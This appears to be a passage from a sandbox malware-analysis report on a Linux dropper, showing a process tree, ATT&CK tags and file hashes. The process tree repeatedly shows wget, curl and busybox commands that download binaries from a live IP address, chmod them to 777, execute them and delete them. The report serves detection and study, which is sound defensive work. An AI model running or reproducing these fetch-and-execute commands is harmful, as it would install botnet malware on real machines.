/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:955
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:961
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:967
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:973
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:979
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:982
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:983
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:985
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:988
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97